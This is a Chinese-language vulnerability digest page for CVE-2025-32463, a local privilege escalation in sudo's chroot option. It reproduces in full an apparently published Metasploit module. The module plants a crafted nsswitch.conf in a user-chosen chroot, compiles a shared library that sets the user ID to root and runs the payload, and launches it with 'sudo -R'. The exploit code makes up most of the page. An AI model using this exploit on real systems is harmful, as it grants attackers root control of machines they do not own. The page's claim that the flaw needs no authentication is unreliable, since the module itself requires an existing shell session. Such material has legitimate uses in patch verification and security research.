Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称: Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号:

  • CVE: CVE-2025-32463

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: Sudo是一个在类Unix操作系统中广泛使用的程序,允许用户以其他用户的权限运行程序,通常是超级用户。它被设计为允许系统管理员委派权限,同时提供对系统命令使用的审计跟踪。Sudo在多种部署场景中都非常常见,尤其是在需要精细权限控制的企业环境中。

该漏洞存在于Sudo的chroot功能中,允许用户在执行命令时使用chroot选项。这一选项旨在允许用户在指定的根目录下运行命令(如果sudoers文件允许)。在版本1.9.14中的更改允许在sudoers仍在评估时通过chroot使用用户指定的根目录解析路径。这允许攻击者诱使Sudo加载任意共享对象,从而导致权限提升。

此漏洞的技术根源在于Sudo在处理chroot选项时的路径解析逻辑缺陷,使得攻击者能够绕过预期的安全限制。攻击者可以利用此漏洞在系统上执行任意代码,从而获得root权限。这种攻击不需要用户交互,且可以在没有认证的情况下被利用,因此构成了严重的安全风险。成功利用此漏洞的攻击者可以完全控制系统,导致数据泄露、服务中断或其他恶意活动。

产品名称: Sudo

影响版本: 1.9.14 <= version < 1.9.17p1

来源: https://github.com/rapid7/metasploit-framework/blob/bb093d928746117ef6833c82536af9ebf2c7929b/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型: rapid7/metasploit-framework:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Post::Linux::Packages
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          Sudo before version 1.19.17p1 allows user to use `chroot` option, when
          executing command. The option is intended to run a command with
          user-selected root directory (if sudoers file allow it). Change in version
          1.9.14 allows resolving paths via `chroot` using user-specified root
          directory when sudoers is still evaluating.
          This allows the attacker to trick Sudo into loading arbitrary shared object,
          thus resulting in a privilege escalation.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # mkdir/chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def check
    sudo_version = installed_package_version('sudo')

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.blank?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe("Sudo #{sudo_version} is not vulnerable")
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    existing_shell = cmd_exec('echo $0 || echo ${SHELL}')

    return Failure::NotFound, 'Could not find shell' unless file?(existing_shell)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!#{existing_shell}\n#{payload.encoded}")

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    mkdir("#{base_dir}/etc")
    mkdir('libnss_')

    return Failure::PayloadFailed, 'Failed to create malicious nsswitch.conf file' unless write_file("#{base_dir}/etc/nsswitch.conf", "passwd: /#{lib_filename}\n")

    return Failure::PayloadFailed, 'Failed to copy /etc/group' unless copy_file('/etc/group', "#{base_dir}/etc/group")

    exploit_code = %<
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL);

    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end


Github Poc
#rapid7/metasploit-framework:github issues #权限提升
Sudo Chroot 1917 Privilege Escalation
http://example.com/2025/07/30/github_2640227637/
作者
lianccc
发布于
2025年7月30日
许可协议